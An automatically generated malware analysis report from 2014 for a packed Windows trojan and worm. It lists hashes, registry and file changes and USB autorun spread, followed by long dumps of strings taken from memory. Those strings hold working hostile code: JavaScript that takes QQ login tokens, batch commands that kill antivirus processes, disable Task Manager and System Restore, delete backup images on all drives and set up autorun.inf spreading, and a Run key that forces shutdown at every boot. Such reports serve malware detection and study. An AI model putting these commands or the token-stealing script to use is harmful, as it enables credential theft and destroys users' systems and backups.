Generic.Malware.SFMDYBVd.380DE3A6_a823d3943c

by malwarelabrobot on September 13th, 2014 in Malware Descriptions.

HEUR:Trojan.Win32.Generic (Kaspersky), Generic.Malware.SFMDYBVd.380DE3A6 (B) (Emsisoft), Generic.Malware.SFMDYBVd.380DE3A6 (AdAware), Trojan.Win32.FlyStudio.FD, GenericEmailWorm.YR, GenericAutorunWorm.YR, GenericInjector.YR (Lavasoft MAS)
Behaviour: Trojan, Worm, EmailWorm, WormAutorun, Malware


This description has been automatically generated by the Lavasoft Malware Analysis System and may contain incomplete or inaccurate information.


MD5: a823d3943c7ecc605d5e5a2346eec144
SHA1: eb47cadac6c5d8d7e773bb41c91363c90bb181bf
SHA256: c46c81403bc2643dd9cbad88c3bf9bf1e0b82adc1fe6db44df2131cd0a03dc49
SSDeep: 6144:nq9Eypeh23JV66dr1p VOWliICbpJouNjbb1FSEBqVg8OM0bzp45fW:q9N3JV6kr1cVOWdCLFfXf8gnp41W
Size: 304640 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: PackerUPXCompresorGratuitowwwupxsourceforgenet, UPolyXv05_v6
Company: no certificate found
Created at: 2013-08-20 20:07:35
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

Behaviour   | Description
EmailWorm   | A worm that can send e-mails.
WormAutorun | A worm that can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Generic's file once a user opens the drive's folder in Windows Explorer.


Process activity

The Generic creates the following process(es):

net.exe:1364
net.exe:1772
net1.exe:1316
net1.exe:644

The Generic injects its code into the following process(es):

%original file name%.exe:1756

Mutexes

The following mutexes were created/opened:

RasPbFile
ShimCacheMutex

File activity

The process %original file name%.exe:1756 makes changes in the file system.
The Generic creates and/or writes to the following file(s):

C:\slear.bat (50 bytes)
%System%\slear.exe (1425 bytes)

Registry activity

The process %original file name%.exe:1756 makes changes in the system registry.
The Generic creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0E 16 E1 49 03 B3 D8 72 E9 4D AF FC EE 14 31 D0"

To automatically run itself each time Windows is booted, the Generic adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"slear.exe" = "c:\windows\system32\slear.exe"

The process net.exe:1364 makes changes in the system registry.
The Generic creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9E F6 22 70 43 C0 C8 57 FE 6D 41 29 4E 51 1A F0"

The process net.exe:1772 makes changes in the system registry.
The Generic creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "69 69 8C 28 D6 E0 14 4D 51 9F 20 DE C2 2D 93 22"

The process net1.exe:1316 makes changes in the system registry.
The Generic creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0B 36 7D 30 6D 4A 0A 9E 92 98 50 4A EE 5B 12 7F"

The process net1.exe:644 makes changes in the system registry.
The Generic creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FA 78 7E 91 FB 80 78 06 E8 4F 84 B4 8E C5 03 C3"

Dropped PE files

There are no dropped PE files.

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Generic's file once a user opens a drive's folder in Windows Explorer.

VersionInfo

Company Name: 2013????
Product Name: ??????
Product Version: 1.6.0.0
Legal Copyright: 2013???? ????
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.6.0.0
File Description: 2013
Comments: ??????????(http://www.eyuyan.com)
Language: Language Neutral

PE Sections

Name  | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5
UPX0  | 4096            | 651264       | 0        | 0       | d41d8cd98f00b204e9800998ecf8427e
UPX1  | 655360          | 290816       | 287232   | 5.49401 | d3b9f527d2e9a1552783d2289ad5c0b8
.rsrc | 946176          | 16384        | 16384    | 2.49987 | e2784112b04c223b0d25494fb365f9a9

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 2
caf03e9cc3118627cd7c3d133a311224
0a9ae60a1507dc9b0141dcb01ee413f6

URLs

No activity has been detected.

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

Web Traffic was not found.

The Generic connects to the servers at the following location(s):

%original file name%.exe_1756:

`.rsrc
t$(SSh
~%UVW
u$SShe
atl.dll
wininet.dll
kernel32.dll
advapi32.dll
NTDLL.DLL
HttpOpenRequestA
HttpSendRequestA
HttpQueryInfoA
sleartest.exe
dll.bat
\*.dll
exe.bat
\*.exe
&keyindex=9&pt_aid=549000912&u1=http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone
&clientkey=
hXXp://ptlogin2.qq.com/jump?clientuin=
hXXp://qzs.qq.com/qzone/v5/loginsucc.html?para=izone
skey=
#home&syn_tweet_verson=1&richtype=&richval=&special_url=&subrichtype=&who=1&con=qm
qzreferrer=http://user.qzone.qq.com/
hXXp://taotao.qq.com/cgi-bin/emotion_cgi_publish_v6?g_tk=
qzreferrer=http://cnc.qzs.qq.com/qzone/v6/setting/profile/profile.html?tab=base&nickname=
hXXp://w.qzone.qq.com/cgi-bin/user/cgi_apply_updateuserinfo_new?g_tk=
qzreferrer=http://cnc.qzs.qq.com/qzone/v6/setting/profile/profile.html?tab=space&spacename=
hXXp://w.cnc.qzone.qq.com/cgi-bin/user/cgi_apply_updateuserinfo_new?g_tk=
SSOAxCtrlForPTLogin.SSOForPTLogin2
hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin
document.body.innerHTML=GetuinKey();
function GetuinKey(){var text="";var q_hummerQtrl=null;var g_vOptData=null;if(window.ActiveXObject){try{q_hummerQtrl=new ActiveXObject("SSOAxCtrlForPTLogin.SSOForPTLogin2");var A=q_hummerQtrl.CreateTXSSOData();q_hummerQtrl.InitSSOFPTCtrl(0,A);g_vOptData=q_hummerQtrl.CreateTXSSOData();var a=q_hummerQtrl.DoOperation(1,g_vOptData);var V=a.GetArray("PTALIST");var f=V.GetSize();var H=$("list_uin");for(var g=0;g<f;g  ){var E=V.GetData(g);var P=E.GetDWord("dwSSO_Account_dwAccountUin");var U=E.GetStr("strSSO_Account_strNickName");var G=E.GetBuf("bufST_PTLOGIN");var A=G.GetSize();var N="";for(var Y=0;Y<A;Y  ){var B=G.GetAt(Y).toString("16");if(B.length==1){B="0" B};N =B};text =P '|' U '|' N ';'}}catch(b){}};return text};
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
http=
https
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
HTTP/1.1
hXXp://
len = str.length; i < len;   i) hash  = (hash << 5)   str.charCodeAt(i);
var t = QZONE.FormSender;
if (t && t.pluginsPool) t.pluginsPool.formHandler.push(function(fm) {
var a = QZFL.string.trim(fm.action);
a  = (a.indexOf("?") > -1 ? "&": "?")   "g_tk="   QZFL.pluginsDefine.getACSRFToken();
fm.action = a
slear && del / f / s / q c:\slear.bat
c:\slear.bat
cmd.exe
c:\windows\system\shutdown.bat
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\slear.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "reboot_system" /t REG_SZ /d "shutdown -s -t 0"
del :\forshotdown.cmd
shutdown -s -t 0 && del / f / s / q c:\slear.bat
c:\windows\system32\slear.exe
Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr
hXXp://VVV.shafou.com
copy %0 %windir%\system32\cmd.bat
attrib %windir%\system32\cmd.bat  r  s  h
%s% /im pfw.exe shadowtip.exe shadowservice.exe qq.exe explorer.exe IEXOLORE.EXE /f >nul
%s% /im norton* /f >nul
%s% /im av* /f >nul
%s% /im fire* /f >nul
%s% /im anti* /f >nul
%s% /im spy* /f >nul
%s% /im bullguard /f >nul
%s% /im PersFw /f >nul
%s% /im KAV* /f >nul
%s% /im ZONEALARM /f >nul
%s% /im SAFEWEB /f >nul
%s% /im OUTPOST /f >nul
%s% /im nv* /f >nul
%s% /im nav* /f >nul
%s% /im F-* /f >nul
%s% /im ESAFE /f >nul
%s% /im cle /f >nul
%s% /im BLACKICE /f >nul
%s% /im def* /f >nul
%s% /im 360safe.exe /f >nul
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL /v
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRecentDocsMenu /t
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDrives /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v Disableregistrytools /t
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetHood /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /V NoDesktop /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFind /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogOff /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSetTaskBar /t REG_DWORD
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows" "NT\CurrentVersion\SystemRestore /v DisableSR /t REG_DWORD /d
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows" "NT\SystemRestore /v DisableConfig /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v RestrictRun /t REG_DWORD /d
for %%c in (c %alldrive%) do del %%c:\*.gho /f /s /q >nul
echo @echo off >d:\setup.bat
!^.^ >>d:\setup.bat
echo copy d:\setup.bat c:\Documents" "and" "Settings\All" "Users\
\a.bat >>d:\setup.bat
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v setup.bat /t REG_SZ /d d:\setup.bat
/f >>d:\setup.bat
echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v setup.bat /t REG_SZ /d d:\setup.bat
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v setup.bat /t REG_SZ /d d:\setup.bat
HKEY_CLASSES_ROOT\batfile\shell\open\command /v setup.bat /t REG_SZ /d d:\setup.bat /f >>d:\setup.bat
echo [windows] >> %windir%\win.ini
echo run=d:\setup.bat C:\AUTOEXEC.BAT >> %windir%\win.ini
echo load=d:\setup.bat C:\AUTOEXEC.BAT >> %windir%\win.ini
echo [boot] >> %windir%\system.ini
echo shell=explorer.exe setup.bat C:\AUTOEXEC.BAT >> %windir%\system.ini
echo [AutoRun] >d:\autorun.inf
echo Open=setup.bat >>d:\autorun.inf
echo Open=system.bat >>d:\autorun.inf
attrib d:\autorun.inf  r  s  h >>d:\setup.bat
attrib d:\setup.bat  r  s  h >>d:\setup.bat
start d:\setup.bat /min >nul
echo @echo off >>C:\AUTOEXEC.BAT
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v AUTOEXEC.BAT /t REG_SZ /d
C:\AUTOEXEC.BAT /f >>C:\AUTOEXEC.BAT
echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v AUTOEXEC.BAT /t REG_SZ /d
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v AUTOEXEC.BAT /t REG_SZ /d
/f >>C:\AUTOEXEC.BAT
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v setup.bat /t REG_SZ /d d:\setup.bat
echo if not d:\setup.bat start %windir%\system32\cmd.bat /min >>C:\AUTOEXEC.BAT
copy %0 %systemroot%\windows.bat >nul
if not exist %windir%/system32/explorer.bat @echo off >>%windir%/system32/explorer.bat
if not exist C:\AUTOEXEC.BAT start %windir%\system32\cmd.bat /min >>%windir%/system32/explorer.bat
if not exist %windir%\system32\cmd.bat start %systemroot%\windows.bat /min >>%windir%/system32/explorer.bat
C:\AUTOEXEC.BAT /f >>%windir%/system32/explorer.bat
/f >>%windir%/system32/explorer.bat
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v explorer.bat /t REG_SZ /d %
windir%/system32/explorer.bat/f >>%windir%/system32/explorer.bat
echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v explorer.bat /t REG_SZ /d %
windir%/system32/explorer.bat /f >>%windir%/system32/explorer.bat
echo start %systemroot%\windows.bat /min >>%windir%/system32/explorer.bat
attrib %windir%/system32/explorer.bat  r  s  h%
attrib %systemroot%/windows.bat  r  s  h
for %%c in (%alldrive%) do echo @echo off >>%%c:\system.bat
for %%c in (%alldrive%) do echo start %windir%\system32\cmd.bat /min >>%%c:\system.bat
for %%c in (%alldrive%) do echo attrib system.bat  r  s  h >>%%c:\system.bat
for %%c in (%drive%) do echo [AuroRun] >%%c:\autorun.inf
for %%c in (%drive%) do echo Open=system.bat >>%%c:\autorun.inf
copy %0 d:\Program" "Files\run.bat
for %%c in (%alldrive%) do echo if not exist %windir%/system32/explorer.bat start d:\Program" "Files\run.bat /min
>>%%c:\system.bat
for %%c in (%alldrive%) do attrib autorun.inf  r  s  h >>%%c:\system.bat
for %%c in (%alldrive%) do attrib %%c:\autorun.inf  r  s  h >nul
for %%c in (%alldrive%) do attrib %%c:\system.bat  r  s  h >nul
if not exist %windir%/system32/explorer.bat start d:\Program" "Files\run.bat /min >>d:\setup.bat
attrib d:\Program" "Files\run.bat  r  s  h >nul
hXXp://VVV.hackbase.com/subject/2009-09-21/16408.htmlc:\kill.bat
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun
SoftWare \Microsoft \Windows \CurrentVersion \Policies\WinOldApp\Disabled
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind
SOFTWARE\360Safe\safemon\ExecAccess
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop
Software\Policies\Microsoft\Windows\System\DisableCMD
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu
Software\Microsoft\Windows\CurrentVersion\Interner Settings\Zones\3\1803
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRealMode
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{36FC9E60-C465-11CF-8056-444553540000}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E965-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E969-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96A-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96B-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96F-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E973-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E974-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E975-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E977-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E97B-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E97D-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E980-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{71A27CDD-812A-11D0-BEC7-08002BE2092F}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{745A17A0-74D3-11D0-B6FE-00A0C90F57DA}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmboot.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmio.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmload.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ip6fw.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ipnat.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpcdd.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpdd.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpwd.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sermouse.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sr.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Tcpip\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\tdpipe.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\tdtcp.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vga.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vgasave.sys\
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue
Software\Microsoft\Windows\CurrentVersion\Policies\System\Disableregistrytools
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsMenu
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders
assoc .exe=nullfile
assoc .reg=nullfile
assoc .bat=nullfile
assoc .cmd=nullfile
assoc .vbs=nullfile
assoc .txt=nullfile
assoc .com=nullfile
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\BlueStacks" /f
reg delete "HKEY_CLASSES_ROOT\bluestacks" /f
reg delete "HKEY_CLASSES_ROOT\BlueStacks.Apk" /f
@reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t reg_dword /d 00000001 /fc:\guanlian.bat
goto 22c:\slears.bat
.slear
d:\sleartest.exe
adm-music.com
O%u,%
J÷%
ul3PIDL7g7IDSO3lNfL4S7NfzpDVNfc4i7NfE447NftpZ7Nf84h7NfdEv4VdEEqpVdBET4VdSOXpVdWEk4VdoOc4VdoOU4VdWE74VdzO6pVdbEr4Vdf8V0IDoZf0IDD8oP
fEQ8HCD8Q4NfR4b7NfJ477Nftph4VdgEw4VdEED4VddEv4VdeE94VdJEhpVdbECHVdAEU4VdrOypVdlE6pVdoOc4VdfESPID78E0IDNZjP
c:\windows\system32\
F%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
__MSVCRT_HEAP_SELECT
user32.dll
iphlpapi.dll
SHLWAPI.dll
MPR.dll
VERSION.dll
WSOCK32.dll
.PAVCException@@
.PAVCNotSupportedException@@
.PAVCFileException@@
(*.prn)|*.prn|
(*.*)|*.*||
Shell32.dll
Mpr.dll
Advapi32.dll
User32.dll
Gdi32.dll
Kernel32.dll
(&07-034/)7 '
?? / %d]
%d / %d]
: %d]
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
out.prn
%d.%d
%d / %d
%d/%d
Bogus message code %d
(%d-%d):
%ld%c
VVV.dywt.com.cn
%s <%s>
Reply-To: %s
From: %s
To: %s
Subject: %s
Date: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
SMTP
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
zcÁ
c:\%original file name%.exe
#include "l.chs\afxres.rc" // Standard components
GetCPInfo
WinExec
GetProcessHeap
RegOpenKeyExA
RegCreateKeyA
RegDeleteKeyA
RegCreateKeyExA
RegCloseKey
GetViewportExtEx
ScaleViewportExtEx
SetViewportExtEx
OffsetViewportOrgEx
SetViewportOrgEx
GetViewportOrgEx
ShellExecuteA
GetKeyState
SetWindowsHookExA
GetKeyboardLayout
VkKeyScanExA
keybd_event
CreateDialogIndirectParamA
UnhookWindowsHookEx
.text
`.rdata
@.data
.rsrc
%FN~/v
r1.Xj9S/-W
 %CGK
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity name="E.App" processorArchitecture="x86" version="5.1.0.0" type="win32"/><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency></assembly>PAD
KERNEL32.DLL
ADVAPI32.dll
COMCTL32.dll
comdlg32.dll
GDI32.dll
ole32.dll
OLEAUT32.dll
RASAPI32.dll
SHELL32.dll
USER32.dll
WININET.dll
WINMM.dll
WINSPOOL.DRV
WS2_32.dll
(*.*)
1.6.0.0
(hXXp://VVV.eyuyan.com)

%original file name%.exe_1756_rwx_00401000_000E4000:

t$(SSh
~%UVW
u$SShe
atl.dll
wininet.dll
kernel32.dll
advapi32.dll
NTDLL.DLL
HttpOpenRequestA
HttpSendRequestA
HttpQueryInfoA
sleartest.exe
dll.bat
\*.dll
exe.bat
\*.exe
&keyindex=9&pt_aid=549000912&u1=http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone
&clientkey=
hXXp://ptlogin2.qq.com/jump?clientuin=
hXXp://qzs.qq.com/qzone/v5/loginsucc.html?para=izone
skey=
#home&syn_tweet_verson=1&richtype=&richval=&special_url=&subrichtype=&who=1&con=qm
qzreferrer=http://user.qzone.qq.com/
hXXp://taotao.qq.com/cgi-bin/emotion_cgi_publish_v6?g_tk=
qzreferrer=http://cnc.qzs.qq.com/qzone/v6/setting/profile/profile.html?tab=base&nickname=
hXXp://w.qzone.qq.com/cgi-bin/user/cgi_apply_updateuserinfo_new?g_tk=
qzreferrer=http://cnc.qzs.qq.com/qzone/v6/setting/profile/profile.html?tab=space&spacename=
hXXp://w.cnc.qzone.qq.com/cgi-bin/user/cgi_apply_updateuserinfo_new?g_tk=
SSOAxCtrlForPTLogin.SSOForPTLogin2
hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin
document.body.innerHTML=GetuinKey();
function GetuinKey(){var text="";var q_hummerQtrl=null;var g_vOptData=null;if(window.ActiveXObject){try{q_hummerQtrl=new ActiveXObject("SSOAxCtrlForPTLogin.SSOForPTLogin2");var A=q_hummerQtrl.CreateTXSSOData();q_hummerQtrl.InitSSOFPTCtrl(0,A);g_vOptData=q_hummerQtrl.CreateTXSSOData();var a=q_hummerQtrl.DoOperation(1,g_vOptData);var V=a.GetArray("PTALIST");var f=V.GetSize();var H=$("list_uin");for(var g=0;g<f;g  ){var E=V.GetData(g);var P=E.GetDWord("dwSSO_Account_dwAccountUin");var U=E.GetStr("strSSO_Account_strNickName");var G=E.GetBuf("bufST_PTLOGIN");var A=G.GetSize();var N="";for(var Y=0;Y<A;Y  ){var B=G.GetAt(Y).toString("16");if(B.length==1){B="0" B};N =B};text =P '|' U '|' N ';'}}catch(b){}};return text};
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
http=
https
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
HTTP/1.1
hXXp://
len = str.length; i < len;   i) hash  = (hash << 5)   str.charCodeAt(i);
var t = QZONE.FormSender;
if (t && t.pluginsPool) t.pluginsPool.formHandler.push(function(fm) {
var a = QZFL.string.trim(fm.action);
a  = (a.indexOf("?") > -1 ? "&": "?")   "g_tk="   QZFL.pluginsDefine.getACSRFToken();
fm.action = a
slear && del / f / s / q c:\slear.bat
c:\slear.bat
cmd.exe
c:\windows\system\shutdown.bat
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\slear.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "reboot_system" /t REG_SZ /d "shutdown -s -t 0"
del :\forshotdown.cmd
shutdown -s -t 0 && del / f / s / q c:\slear.bat
c:\windows\system32\slear.exe
Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr
hXXp://VVV.shafou.com
copy %0 %windir%\system32\cmd.bat
attrib %windir%\system32\cmd.bat  r  s  h
%s% /im pfw.exe shadowtip.exe shadowservice.exe qq.exe explorer.exe IEXOLORE.EXE /f >nul
%s% /im norton* /f >nul
%s% /im av* /f >nul
%s% /im fire* /f >nul
%s% /im anti* /f >nul
%s% /im spy* /f >nul
%s% /im bullguard /f >nul
%s% /im PersFw /f >nul
%s% /im KAV* /f >nul
%s% /im ZONEALARM /f >nul
%s% /im SAFEWEB /f >nul
%s% /im OUTPOST /f >nul
%s% /im nv* /f >nul
%s% /im nav* /f >nul
%s% /im F-* /f >nul
%s% /im ESAFE /f >nul
%s% /im cle /f >nul
%s% /im BLACKICE /f >nul
%s% /im def* /f >nul
%s% /im 360safe.exe /f >nul
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL /v
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRecentDocsMenu /t
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDrives /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v Disableregistrytools /t
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetHood /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /V NoDesktop /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFind /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogOff /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSetTaskBar /t REG_DWORD
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows" "NT\CurrentVersion\SystemRestore /v DisableSR /t REG_DWORD /d
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows" "NT\SystemRestore /v DisableConfig /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v RestrictRun /t REG_DWORD /d
for %%c in (c %alldrive%) do del %%c:\*.gho /f /s /q >nul
echo @echo off >d:\setup.bat
!^.^ >>d:\setup.bat
echo copy d:\setup.bat c:\Documents" "and" "Settings\All" "Users\
\a.bat >>d:\setup.bat
